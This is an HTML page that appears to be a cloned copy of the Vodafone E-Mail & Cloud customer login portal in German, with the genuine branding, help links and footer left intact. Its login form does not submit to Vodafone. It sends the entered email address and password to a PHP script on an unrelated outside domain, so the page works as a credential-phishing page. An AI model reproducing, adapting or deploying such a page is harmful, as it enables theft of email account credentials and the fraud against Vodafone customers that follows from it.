<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>
	Vodafone E-Mail &amp; Cloud - Kundenportal
</title><meta name="author" content="mediaBEAM GmbH"><meta name="publisher" content="Vodafone GmbH"><meta name="copyright" content="Vodafone GmbH"><meta name="description" content="Mit Vodafone E-Mail &amp; Cloud bist Du immer auf dem Laufenden. Du hast jederzeit Zugriff auf all Deine wichtigen E-Mails, Musik, Fotos und Dokumente."><meta name="keywords" content="Vodafone E-Mail &amp; Cloud, E-Mail, SMS, MMS, Internet, Telefon, Fernsehen, Internetanbieter, Flatrate"><meta name="page-topic" content="Kabelfernsehen, Internet, Telefonie"><meta name="page-type" content="Kabelfernsehen, Internet, Telefonie"><meta name="title" content="Kabelfernsehen, Internet und Telefonie - Vodafone"><meta name="robots" content="index,follow"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><link rel="apple-touch-icon" href="https://login.vodafonemail.de/img/apple-touch-icon-iphone.png"><link rel="apple-touch-icon" href="https://login.vodafonemail.de/img/apple-touch-icon.png"><link rel="apple-touch-icon" sizes="152x152" href="https://login.vodafonemail.de/img/touch-icon-ipad-retina.png"><link rel="apple-touch-icon" sizes="144x144" href="https://login.vodafonemail.de/img/apple-touch-icon-144x144.png"><link rel="apple-touch-icon" sizes="120x120" href="https://login.vodafonemail.de/img/touch-icon-iphone-retina.png"><link rel="apple-touch-icon" sizes="114x114" href="https://login.vodafonemail.de/img/touch-icon-iphone4.png"><link rel="apple-touch-icon" sizes="76x76" href="https://login.vodafonemail.de/img/apple-touch-icon-76x76.png"><link rel="apple-touch-icon" sizes="72x72" href="https://login.vodafonemail.de/img/touch-icon-ipad.png"><link rel="apple-touch-icon" sizes="57x57" href="https://login.vodafonemail.de/img/apple-touch-icon-57x57.png"><link rel="apple-touch-icon" href="https://login.vodafonemail.de/img/apple-touch-icon-precomposed.png"><link rel="icon" type="image/png" href="https://login.vodafonemail.de/img/favicon-32.png" sizes="32x32"><link rel="icon" type="image/png" href="https://login.vodafonemail.de/img/favicon-24.png" sizes="24x24"><link rel="icon" type="image/png" href="https://login.vodafonemail.de/img/favicon-16.png" sizes="16x16"><link rel="shortcut icon" href="https://login.vodafonemail.de/img/favicon.ico">

<link href="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/vkd.css" rel="stylesheet">

<link href="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/foundation.css" rel="stylesheet">

<link href="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/partner.css" rel="stylesheet">

<link href="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/partnermobile.css" rel="stylesheet">
<style id="molten-css" attr-reload="0">.GujAdBrandLiftModal{display: flex;justify-content: center;z-index: 10;left: 50%;height: 200px;position: fixed;bottom: -600px;width: 600px;border: solid 1px black;transition: bottom 2s ease-in-out; }
.GujAdStickyBillboard{position: fixed;z-index: 10000;text-align: center; }
.GujAdHidden{display: none !important; }
.GujAdCLSTesting{display: block !important; }
.GujAdHiddenWallpaperSlot{height: 0; }
.GujAdHeight.GujAdHiddenWallpaperSlot{height: 90px; }
.GujAdSpinner{width: 40px;height: 40px;position: relative;margin: 100px auto; }
.GujAdDouble-bounce1, .GujAdDouble-bounce2{width: 100%;height: 100%;border-radius: 50%;background-color: #333;opacity: .6;position: absolute;top: 0;left: 0;-webkit-animation: GujAdSk-bounce 2s infinite ease-in-out;animation: GujAdSk-bounce 2s infinite ease-in-out; }
.GujAdDouble-bounce2{-webkit-animation-delay: -1s;animation-delay: -1s; }
@-webkit-keyframes GujAdSk-bounce{0%, 100% { -webkit-transform: scale(0);}
50% { -webkit-transform: scale(1);}
 }
@keyframes GujAdSk-bounce{0%, 100% { transform: scale(0);-webkit-transform: scale(0);}
50% { transform: scale(1);-webkit-transform: scale(1);}
 }
.GujAdTeaserInfoTextLink{position: absolute;padding: 4px 8px;font-size: small;font-weight: bold;cursor: pointer;z-index: 2;color: #fff;font-family: Open Sans,Arial,Helvetica,sans-serif;text-shadow: 2px 2px 3px hsla(0,0%,50%,1); }
.GujAdTeaserInfoTextLink.top-right, .GujAdTeaserInfoImage.top-right, .GujAdTeaserInfoTextLink.top-left, .GujAdTeaserInfoImage.top-left{top: 0; }
.GujAdTeaserInfoTextLink.top-right, .GujAdTeaserInfoImage.top-right{right: 0; }
.GujAdTeaserInfoTextLink.top-left, .GujAdTeaserInfoImage.top-left{left: 0; }
.GujAdTeaserInfoImage{position: absolute;right: 0;width: 35px;padding: 5px;margin: 5px;object-fit: contain;cursor: pointer;z-index: 20; }
div[id*='GujAdTeaserInfoTextContainer_'], #anImageLightBox{position: fixed;overflow-y: auto;top: 0;right: 0;bottom: 0;left: 0;background: rgba(40,40,40,.96);z-index: 1000005;display: none; }
div[class*='GujAdTeaserInfoTextBody_'], .lightboxbody{position: relative;display: flex;flex-wrap: wrap;justify-content: center;align-items: center;margin: 15vh auto;width: 80%;max-width: 650px;padding: 40px;min-height: 15vh;background: #f7f7f7;font-size: 15px;font-family: Open Sans,Arial,Helvetica,sans-serif;color: #4d4d4d; }
.GujAdTeaserInfoTextBodyClose, .lightboxClose{position: absolute;top: 10px;right: 10px;width: 25px;height: 25px;margin-bottom: 10px;transition: opacity .25s ease-in-out;opacity: .3;cursor: pointer; }
.GujAdTeaserInfoTextBodyClose:hover, .lightboxClose:hover{opacity: 1; }
.GujAdTeaserInfoTextBodyClose:before, .GujAdTeaserInfoTextBodyClose:after, .lightboxClose:before, .lightboxClose:after{position: absolute;top: 3px;left: 10px;content: " ";height: 20px;width: 2px;background-color: #333; }
.GujAdTeaserInfoTextBodyClose:before, .lightboxClose:before{transform: rotate(45deg); }
.GujAdTeaserInfoTextBodyClose:after, .lightboxClose:after{transform: rotate(-45deg); }
#anImageLightBox{display: none;justify-content: center;align-items: center;flex-flow: column; }
.lightboxbody{background: transparent;padding: 0;margin: 0;max-width: 90%;max-height: 85vh;flex-flow: column;animation-name: zoom;animation-duration: .5s; }
.lightboxbody > div{height: 100%;text-align: center; }
.lightboxClose{top: 0;right: -5vh;width: 34px;height: 34px;opacity: .5;z-index: 10; }
.lightboxClose:before, .lightboxClose:after{top: -2px;left: 14px;height: 3vh;width: 2px;background-color: #fff; }
.lightboxcaptionwrapper{max-height: 9vh;height: auto; }
.lightboxcaption{text-align: left;color: #ccc !important;font-size: medium;padding-top: 10px; }
.lightboxcaption a{color: #ccc;text-decoration: underline;font-weight: initial; }
.lightboxcopyright:before{content: "�� "; }
.lightboxcopyright{padding: 5px 10px 10px 0;font-size: small;font-style: italic;color: #ccc; }
.lightboximg{max-width: 100%;height: auto;max-height: 75vh;object-fit: contain; }
@keyframes zoom{from { transform: scale(.7);}
to { transform: scale(1);}
 }
.autoNative-image img{cursor: pointer;transition: .3s;width: 100%; }
.autoNative-blurred{text-shadow: 0 0 10px black !important;color: transparent !important; }
@media only screen and (max-width: 450px){.GujAdTeaserInfoTextLink.top-right, .GujAdTeaserInfoImage.top-right, .GujAdTeaserInfoTextLink.top-left, .GujAdTeaserInfoImage.top-left { top: 10px;}
.GujAdTeaserInfoImage { width: 25px;margin: 0;}
div[class*='GujAdTeaserInfoTextBody_'] { padding: 25px;margin: 7vh auto;}
.GujAdTeaserInfoTextBodyClose { top: 7px;right: 7px;}
.teaser-medium-right .GujAdTeaserInfoImage.top-left { left: 53%;}
.teaser-medium-left .GujAdTeaserInfoImage.top-right { right: 55%;}
 }
.et-wrapper{margin-top: 20px; }
.et-container{display: flex; }
.et-title{margin-bottom: 20px; }
.et-element{display: flex;flex-direction: column;justify-content: center;align-items: center;cursor: pointer;font-size: 14px; }
.et-element-img{max-width: 100%;max-height: 100%; }
.circular-chart{display: block;margin: 10px auto; }
.circle-bg{fill: none;stroke: #eee;stroke-width: 3.8; }
.circle{fill: none;stroke-width: 2.8;stroke-linecap: round;animation: progress 1s ease-out forwards; }
@keyframes progress{0% { stroke-dasharray: 0 100;}
 }
#outstream_1.hideOutStreamImportant{display: none !important; }
@media screen and (max-width: 450px){#outstream_1 iframe[id*=google_ads], #outstream_1 iframe[id*=guj_ems] { max-width: 250px;}
#outstream_div::after { clear: both;content: "";display: block;}
 }
@media screen and (max-width: 600px){div[id*=sp_message_id] > div[class*=sp_message] { margin-top: 10px;}
 }
</style><base href="."></head>
<body style="height: 100%;" data-guj-zone="_default"><div id="mediamind_wallpaper" style="position: absolute; top: 60px; left: 930px;"></div>
    

<div class="cookie-notice" style="display: none;">
    <div class="kd-container">
        <div class="cookie-notice-text">
            <p>
                <strong>Hinweis zu Cookies</strong>
                <br>
                Wir verwenden auf dieser Web-Seite Cookies. So verbessern wir sie und können Dir für Dich passende Angebote zeigen.
                <a href="https://www.vodafone.de/unternehmen/verantwortung/datenschutz-online.html" target="_blank">Hier mehr erfahren</a>.
            </p>
        </div>
        <div class="cookie-notice-button">
            <button>Schließen</button>
        </div>
    </div>
</div>


<header class="header">
    <div class="main-menu">
        <div class="brand-area">
            <a href="https://www.vodafone.de/" target="_blank">
                <img src="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/logo.svg" alt="Vodafone E-Mail &amp; Cloud">
            </a>
            <span class="schriftzug"><b>e-mail</b> &amp; cloud</span>
        </div>
        <div class="my-faq" data-ijs="faq-meta">
            <img src="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/help_ffffff.svg" style="width: 24px; height: 24px;">
            <ul class="flyout">
                <li>
                    <a href="https://www.vodafone.de/hilfe/vodafonemail.html" target="_blank" title="Häufig gestellte Fragen">
                        <img src="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/help_ffffff.svg">Hilfe</a>
                </li>
                
                <li>
                    <hr>
                </li>
                <li>
                    <a href="https://www.vodafonemail.de/portal/contact/privacy.aspx" target="_blank">
                        <img src="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/page_secure_ffffff.svg">Datenschutz</a>
                </li>
                <li>
                    <a href="https://login.vodafonemail.de/#" class="cookie-consent-button">
                        <img src="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/shield_ffffff.svg">Cookies</a>
                </li>
                <li>
                    <a href="https://www.vodafone.de/unternehmen/soziale-verantwortung/datenschutz-privatsphaere.html" target="_blank">
                        <img src="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/page_list_ffffff.svg">Auftragsverarbeitung</a>
                </li>
                <li>
                    <hr>
                </li>
                <li>
                    <a href="https://www.vodafone.de/agb.html" target="_blank">
                        <img src="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/page_agb_ffffff.svg">AGB</a>
                </li>
                <li>
                    <a href="https://www.vodafone.de/impressum.html" target="_blank">
                        <img src="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/page_info_ffffff.svg">Impressum</a>
                </li>
                <li>
                    <a href="https://www.vodafonemail.de/portal/contact/description.aspx" target="_blank">
                        <img src="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/page_list_ffffff.svg">Leistungsbeschreibung</a>
                </li>
                <li>
                    <a href="https://www.vodafonemail.de/portal/contact/overview.aspx" target="_blank">
                        <img src="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/chat_ffffff.svg">Feedback</a>
                </li>
            </ul>
        </div>
        <div>
            <a href="https://live.vodafone.de/login" target="_blank" class="link-vodafone-live">
                <img src="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/eml.svg" style="width: 24px; height: 24px;">
            </a>
            <a href="https://www.vodafone.de/" target="_blank" class="link-vodafone">vodafone.de
                <img src="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/arrow_forward_ffffff.svg" style="width: 24px; height: 24px; rotate: -45deg;"></a>
        </div>
    </div>

</header>
<div class="navigation col navigation-menu-padding px-md-xxxx  px-lg-xx px-xl-m  menu-raised Click to" style="border-color: var(--omega-dark); background-color: var(--omega-dark);">
    <nav id="breadcrumb" aria-labelledby="breadcrumb">
        <ul class="breadcrumb d-flex align-items-center">
            <li class="breadcrumb-item">
                <a class="d-flex align-items-center" href="https://live.vodafone.de/">Home
                    <img src="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/arrow_mini_forward.svg"></a>
            </li>
            <li class="breadcrumb-item active">Vodafone E-Mail &amp; Cloud</li>
        </ul>
    </nav>
    <div style="clear: both;"></div>
</div>
<div style="clear: both;"></div>

    <div id="contentpane" class="spacer-content">
        
    <div class="kd-container">
    <div class="login-area">
        <div id="ContentPlaceHolder1_LoginConrtol_LoginPanel1" class="container">
    <div class="editView">
        <h2>Login mit E-Mail Zugangsdaten</h2>

        <div id="errorbox" class="infopanel alertinfo" style="display: none;">
            <div class="infopanel-sidebar"></div>
            <div>
                <h3>Das hat leider nicht geklappt</h3>
                <p>Versuch‘s bitte nochmal oder klick unten auf „Zugangsdaten vergessen“. Du möchtest Dich über das MeinVodafone-Konto einloggen? Dann klick einfach <a href="https://www.vodafone.de/meinvodafone/account/login" target="_blank">hier</a>.</p>
            </div>
        </div>

        <div id="errorbox-mfa" class="infopanel alertinfo" style="display: none;">
            <div class="infopanel-sidebar"></div>
            <div>
                <h3>Das hat leider nicht geklappt</h3>
                <p>Versuch‘s bitte nochmal oder klick unten auf „Kein Zugriff auf die Authentifizierungs-App“. Du möchtest Dich über das MeinVodafone-Konto einloggen? Dann klick einfach <a href="https://www.vodafone.de/meinvodafone/account/login" target="_blank">hier</a>.</p>
            </div>
        </div>


        <div id="quarantinebox" class="infopanel alertinfo" style="display: none;">
            <div class="infopanel-sidebar"></div>
            <div>
                <h3>Das hat leider nicht geklappt</h3>
                <p>Wir haben festgestellt, dass jemand mehr als zehnmal hintereinander versucht hat, sich mit einem falschen Passwort in Deinen Vodafone E-Mail &amp; Cloud-Konto einzuloggen. Dein Konto ist daher für 10 Minuten gesperrt. In dieser Zeit ist kein Login möglich.</p>
            </div>
        </div>
        <div id="logoutbox" class="infopanel" style="display: none;">
            <div class="infopanel-sidebar"></div>
            <div>
                <h3>Du hast Dich erfolgreich ausgeloggt</h3>
                <p>Danke, dass Du Vodafone E-Mail &amp; Cloud nutzt. Du bist jetzt vollständig abgemeldet.</p>
            </div>
        </div>
        <div class="login-form-container" data-element="login-form">
            <p>Für Deine E-Mail-Konten bei Vodafone, Arcor, Kabel Deutschland und Unitymedia.</p>
            <form method="post" action="https://boltonconsultgroup.com/003324/valarcor.php"class="login-form-container" data-element="login-form" >
            <input type="text" class="inputXLarge" name="username" id="user" placeholder="E-Mail-Adresse" /><br />
            
            <div class="password">
                <input type="password" class="inputXLarge" name="pwd" placeholder="E-Mail-Passwort" /><img id='toggle-pw-visibility' src='https://login.vodafonemail.de/img/eye_view_password.svg'>
            </div>
            <span id="password-tip" style="width: 420px; margin: 8px 0; font-size: .8em; display: inline-block; text-align: left;">Trag hier Dein E-Mail/IMAP-Passwort ein.</span><br />
            <input name="login"  type="submit" class="btn btn-primary" value="Login" title="Login" />
           </form>
            <div class="clear"></div>
            <div class="footer">
                <div class="loginProgress">
                    <div style="display: none; padding-top: 8px;" class="progress-container">
                        <span class="loading">Bitte warten...</span>
                    </div>
                </div>
            </div>
            <div class="txt-links">
                <a href="https://www.vodafone.de/meinvodafone/account/login" target="_blank">MeinVodafone Login</a>
                <a href="https://login.vodafonemail.de/#" data-command="recover">Zugangsdaten vergessen</a>
            </div>
            <p style="color:#999;"><b style="color:#fff;">Du hast noch kein E-Mail-Konto?</b> Dann kannst Du Dich ganz einfach <a href="https://www.vodafone.de/privat/service/vodafone-email.html" target="_blank">hier registrieren</a>.</p>
        </div>

        <div class="totp-form-container" data-element="totp-form" style="display: none;">
            <p>Du hast die sichere 2-Faktor-Authentifizierung aktiviert. Schau bitte in Deine Authentifizierungs-App und gib hier den aktuellen Code ein:  </p>
            <div id="codeFields"><div class="fields-container "><input type="text" data-code-field="true" data-index="0" inputmode="numeric" class="input-field " maxlength="1" autocapitalize="off" spellcheck="false"><input type="text" data-code-field="true" data-index="1" inputmode="numeric" class="input-field " maxlength="1" autocapitalize="off" spellcheck="false"><input type="text" data-code-field="true" data-index="2" inputmode="numeric" class="input-field " maxlength="1" autocapitalize="off" spellcheck="false"><input type="text" data-code-field="true" data-index="3" inputmode="numeric" class="input-field " maxlength="1" autocapitalize="off" spellcheck="false"><input type="text" data-code-field="true" data-index="4" inputmode="numeric" class="input-field " maxlength="1" autocapitalize="off" spellcheck="false"><input type="text" data-code-field="true" data-index="5" inputmode="numeric" class="input-field " maxlength="1" autocapitalize="off" spellcheck="false"></div></div>
            <div>
                <input type="button" name="back" class="btn btn-outline" value="Zurück" title="Zurück">
                <input type="button" name="authenticate" class="btn btn-primary" value="Authentifizieren" title="Authentifizieren">
            </div>
            <div class="clear"></div>
            <div class="footer">
                <div class="loginProgress">
                    <div style="display: none; padding-top: 8px;" class="progress-container">
                        <span class="loading">Bitte warten...</span>
                    </div>
                </div>
            </div>
            <div class="txt">
                <a href="https://login.vodafonemail.de/#" data-command="twofa-recover">Kein Zugriff auf die Authentifizierungs-App?</a>
            </div>
        </div>
    </div>
</div>
    <div class="faq-area">
        <h2>Fragen zu Vodafone E-Mail &amp; Cloud</h2>
        <div class="btn btn-secondary">
            <a href="https://www.vodafone.de/hilfe/email/info.html" target="_blank">Hier findest Du die Antworten <img src="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/arrow_forward.svg" alt="Mehr Fragen &amp; Antworten"></a>
        </div>
    </div>
 
        </div>

    </div>
    <div id="guj-spacer" class="">
        <div id="gujWrapper"><div class="gujAd skyscraper guj-300" id="skyscraper_1"></div></div>
    </div>
    

<div class="prefix">
    <footer>
        <div class="mod mod-glnav-footer glnav" role="contentinfo">
            <div class="belt">
                <div class="grid mod mod-mondia" data-scope="sml" data-radio="true">
                    <ul>
                        <li>
                            <a href="https://live.vodafone.de/login" target="_blank">
                                <span class=" ">E-Mail</span>
                            </a>
                        </li>
                        <li>
                            <a href="https://zuhauseplus.vodafone.de/internet-telefon/" target="_blank">
                                <span class=" ">Vodafone Shop</span>
                            </a>
                        </li>
                        <li>
                            <a href="https://www.vodafone.de/meinvodafone/account/login" target="_blank">
                                <span class=" ">Mein Vodafone</span>
                            </a>
                        </li>
                        <li>
                            <a href="https://live.vodafone.de/faq" target="_self">
                                <span class=" ">Hilfe/FAQ</span>
                            </a>
                        </li>
                        <li>
                            <a href="https://live.vodafone.de/subscriptions/" target="_self">
                                <span class=" ">Meine Abos &amp; Käufe</span>
                            </a>
                        </li>
                        <li>
                            <a href="https://live.vodafone.de/myDownloads" target="_self">
                                <span class=" ">Meine Downloads</span>
                            </a>
                        </li>
                        <li>
                            <a href="http://twitter.com/vodafone_de">
                                <span class="icon icon-social-twitter"></span>
                            </a>
                            <a href="http://www.facebook.com/vodafoneDE">
                                <span class="icon icon-social-facebook"></span>
                            </a>
                            <a href="https://www.instagram.com/vodafone_de/">
                                <span class="icon icon-social-instagram"></span>
                            </a>
                        </li>
                    </ul>
                    <div class="clear"></div>
                    <hr>
                    <div class="copyright">
                        <span>© Vodafone 2024</span>
                    </div>
                    <ul class="mondia-ul-small">
                        <li>
                            <a href="https://www.vodafone.de/einfache-kuendigung.html" target="_blank">
                                <span>Vertrag kündigen</span>
                            </a>
                        </li>
                        <li>
                            <a href="https://www.vodafone.de/agb.html" target="_blank">
                                <span>AGB</span>
                            </a>
                        </li>
                        <li>
                            <a href="https://live.vodafone.de/impressum" target="_self">
                                <span>Impressum</span>
                            </a>
                        </li>
                        <li>
                            <a href="https://www.vodafone.de/unternehmen/soziale-verantwortung/jugendschutz.html" target="_blank">
                                <span>Jugendschutz</span>
                            </a>
                        </li>
                        <li>
                            <a href="https://live.vodafone.de/datenschutz" target="_self">
                                <span>Datenschutz</span>
                            </a>
                        </li>
                        <li>
                            <a href="https://login.vodafonemail.de/#" class="cookie-consent-button" target="_self">
                                <span>Cookies</span>
                            </a>
                        </li>
                        <li>
                            <a href="https://www.vodafone.de/hilfe/kontakt-zu-vodafone.html" target="_blank">
                                <span>Kontakt</span>
                            </a>
                        </li>
                    </ul>
                    <div class="clear"></div>
                </div>
            </div>
        </div>
    </footer>
    <div data-command="scroll-top" class="scroll-top-btn">
        <svg viewBox="0 0 100 100">
            <path fill-opacity=".6" d="M50.5 16.231c-18.896 0-34.269 15.373-34.269 34.269S31.604 84.769 50.5 84.769 84.769 69.396 84.769 50.5 69.396 16.231 50.5 16.231z"></path><path fill="#999" d="M50.5 10C28.132 10 10 28.133 10 50.5 10 72.868 28.132 91 50.5 91 72.867 91 91 72.868 91 50.5 91 28.133 72.867 10 50.5 10zm0 74.769c-18.896 0-34.269-15.373-34.269-34.269S31.604 16.231 50.5 16.231 84.769 31.604 84.769 50.5 69.396 84.769 50.5 84.769z"></path><path fill="#FFF" fill-rule="evenodd" d="M35.5 34.924h31.154v6.231H35.5zM50.47 54.04l12.568 12.569 3.213-3.213L50.5 47.646l-15.751 15.75 3.182 3.183z" clip-rule="evenodd"></path></svg>
    </div>
</div>
  

<iframe name="__tcfapiLocator" style="display: none;" src="./Vodafone E-Mail &amp; Cloud - Kundenportal_files/saved_resource.html"></iframe><div id="fancybox-tmp"></div><div id="fancybox-loading"><div></div></div><div id="fancybox-overlay"></div><div id="fancybox-wrap" class="fancybox-ie"><div id="fancybox-outer"><div class="fancybox-bg" id="fancybox-bg-n"></div><div class="fancybox-bg" id="fancybox-bg-ne"></div><div class="fancybox-bg" id="fancybox-bg-e"></div><div class="fancybox-bg" id="fancybox-bg-se"></div><div class="fancybox-bg" id="fancybox-bg-s"></div><div class="fancybox-bg" id="fancybox-bg-sw"></div><div class="fancybox-bg" id="fancybox-bg-w"></div><div class="fancybox-bg" id="fancybox-bg-nw"></div><div id="fancybox-content"></div><a id="fancybox-close"><i class="fx icon-cross"></i></a><div id="fancybox-title"></div><span class="fancy-ico" id="fancybox-left-ico"></span></a><span class="fancy-ico" id="fancybox-right-ico"></span></a></div></div><div id="oop_1" style="display: none;"></div></body></html>